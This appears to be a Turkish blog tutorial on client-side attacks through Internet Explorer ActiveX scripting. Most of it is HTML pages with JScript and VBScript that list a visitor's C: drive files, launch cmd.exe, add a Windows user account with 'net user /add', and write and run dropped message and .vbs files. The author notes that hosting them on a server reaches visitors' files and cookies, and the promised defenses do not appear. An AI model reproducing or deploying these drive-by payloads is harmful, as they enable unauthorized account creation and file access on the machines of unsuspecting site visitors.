ActiveX Java Applet Script Uygulamarı İle Sisteme Girme

Bu Günkü Konumuz Scriptler, Genel Anlamda Sisteminizi Sizin İzniniz İle Elegeçirmek İçin Kullanılan Aslen İyi Fakat Kullan Tarafindan Kötüye Kullanılan Kodları İncelyeceğiz. İlk Olarak Jsript İle Sonra Vbscript Ve Son Olarak Hta Ve Java Applet Uygumaları İle Gerek Asp Gerek Html Gerekse Php Dilleri İle İstemciye Yönelik Atack Ve Savunmaya Göz Atacağız. Şimdi İlk Olarak Jscript Kullanarak İstemci Yönelimli Bir FSO Yazıyorum...
Metin Editörünü Açıyoruz ve başlıyoruz.
Öncelikle En Önemli Olan Şey Dosyalarımızdan Başlıyoruz...
İstemcinin Dosyalarina Bakalım Nelermiş

<html>
<title> r10bilgileri.blogspot.com title>
<script language="JavaScript">
// burada kucuk buyuk harf duyarliligina dikkat edin js ciler bilir ama ben yinede uyarayım :) :;)
var yolum = 'c:\\';
//simdi ise fso nesnesini tanımlayalim
var fso = new ActiveXObject('Scripting.FileSystemObject');
//simdi Dosyalara bakalım :)
var klsr = fso.Getfolder(yolum);
//simdi dosyalara bakalim varmi yokmu varsa sayalim, yoksa islemi bitirelim :)
for (dosyalari = new Enumerator(klsr.files); !dosyalari.atEnd();
dosyalari.moveNext())
{
var dosyalar = dosyalari.item();
document.write(dosyalar.name, "
" );
}




Ve Kaydedelim. Bu Scripti Çalıştırdığınızda, C Sürücüsündeki Dosyalarınıza Ulaşacaksınız. Bunu Bir Sunucu Üzerinde Yayimladiğinizdada Ayni Şekilde Ziyaretcileriniz Kendi Dosyalarina Ulaşacak. Bunlari Toplayan Bir Çok Kişi Var. Dol Belirtildikten Sonra Tüm Çerezlerinizede Ulaşmak Mumkun. Bir Çoğu Sistemin Kullanıcı Adinin Bilinmediği Sürece Nasil Yol Belirileceğini Düşünebilir. Fakat Windows Altinda %UserProfile% Tanimli Bir Değişken Gibidir. Ve Bu Direk Olarak Kullanıcı Dizinine Gider. Neyse Daha Fazla Uzatmadan Bir Kaç Basit Örnekle Devam Edip Nasil Korunulacağina Deyinelim...

Şimdi İse Kullanici Üzerinde Bir Program Çalıştıralim..
Bunu Ise VbScript İle Yapalim.


<html>
<title> r10bilgileri.blogspot.com title>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' Çalıştırılacak Olan Exenin Yolunu Belirtiyorum. Burada %SystemRoot% Kulu Olan Windows Yoludur. Ayni %UserProfile% gibi ;)
ExeYolu= "%SystemRoot%\system32\cmd.exe"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum
pcalisitir.run ExeYolu
' scripti kapatiyorum :)



Bunu Ayni Şekilde ornek2.html olarak Kayit EttiğiniZ Ve Çalıştırdığınızda Cmd.exe Çalışacaktir.
Şimdi Biraz Daha İleri Giderek Komut Yolayalim ve Birşeyler Yaptiralim

/c parametresi cmd.exe den sonra komut işlemek icin kullanilir ben en basit olarak sisteme bir kullanici eklemek istiyorum ve kolaylik olsun yada Administrator sifresini değiştirelim seçim sizin

<html>
<title> r10bilgileri.blogspot.com title>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' Burada %SystemRoot% Kurulu Olan windows yolu olduğunu yukarda belirttim /c parametresinden sorna geleninde komut olduğunu biliyorsunuz.bi bilmediğiniz net user /add kodyaziyorumcom ? onuda aşağida acikliyacam.
ExeYolKomut = "%SystemRoot%\system32\cmd.exe /c net user /add kodyaziyorumcom"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum
pcalisitir.run ExeYolKomut' scripti kapatiyorum :)




Evet Şuan İçin Sisteme Bir Kullanici Ekledim.Ve Dilediğim Herşeyi Bu Kullanici Adiyla Gerçekleştirebilirim Şimdi Birazcik Daha İlerlemek İstiyor Canim Gerçi Yapılacak Çok Şey Var Ama Neyse Son Bir Örnek Daha Yapalım.


<html>
<title> r10bilgileri.blogspot.comtitle>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' Mesajımızı Yazdiralim :)
ExeYolu = "%SystemRoot%\system32\cmd.exe /c echo Sisteminizde Ciddi Bir Açık Var. Önemsediğiniz Dosyalariniz Veya Hesap Şifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Oneririm ;) > c:\MESAJINVAR.TXT"
' Metin Editörümüzün yolunu tanımlayalim
Ac = "%SystemRoot%\system32\notepad.exe"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdiriyoruz.
pcalisitir.run ExeYolu
' Metin Editörümüz ile mesajımızı acalim :)
pcalisitir.run ac + " c:\MESAJINVAR.TXT"




Burada Mesajıda Bıraktık Metin Editoru İlede Açtık Dilerseniz Mesaj Olarak Farklı Yollada Mesaj Verebilirsiniz Biraz Daha Geliştirerek


<html>
<title> r10bilgileri.blogspot.com title>
<script language="VBScript">
' Hata Durumunda Devam Etmesini Belirtiyorum
On Error Resume Next
' denden işaretini tanımlayalim
denden = chr(34)
' Mesajımızı Yazdiralim :)
ExeYolMesaj = "%SystemRoot%\system32\cmd.exe /c echo MsgBox(" & denden & "Sisteminizde Ciddi Bir Acik Var. Onemsediğiniz Dosyalariniz Veya Hesap Sifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Öneririm" & denden & ") > c:\mesaj.vbs"
'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum
Set pcalisitir = Createobject("Wscript.Shell")
' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdırıyoruz.
pcalisitir.run ExeYolMesaj
' Scripti Çalıştıralim
pcalisitir.run "c:\mesaj.vbs"




Buraya Kadar Anlattıklarımın iexplorer İçindi, Firefox İçin Ise Java Apletleri Kullanacağiz.
ama şimdilik bu ders icin bukadari yeterli iyi çalışmalar kolay gelsin korunmaya yolları ve diğer ayrintilar diğer derslerde. unutmadan net user /add komutunu anlatayım. net user add komutu sisteme kullanici ekler geniş bilgi için
başlat > caliştir > cmd yazıp buraya net user /? yazıp daha ayrıntılı bilgiye sahip olabilirsiniz diğer komutlarıda öğrenirsiniz hadi kolay gelsin iyi çalışmalar.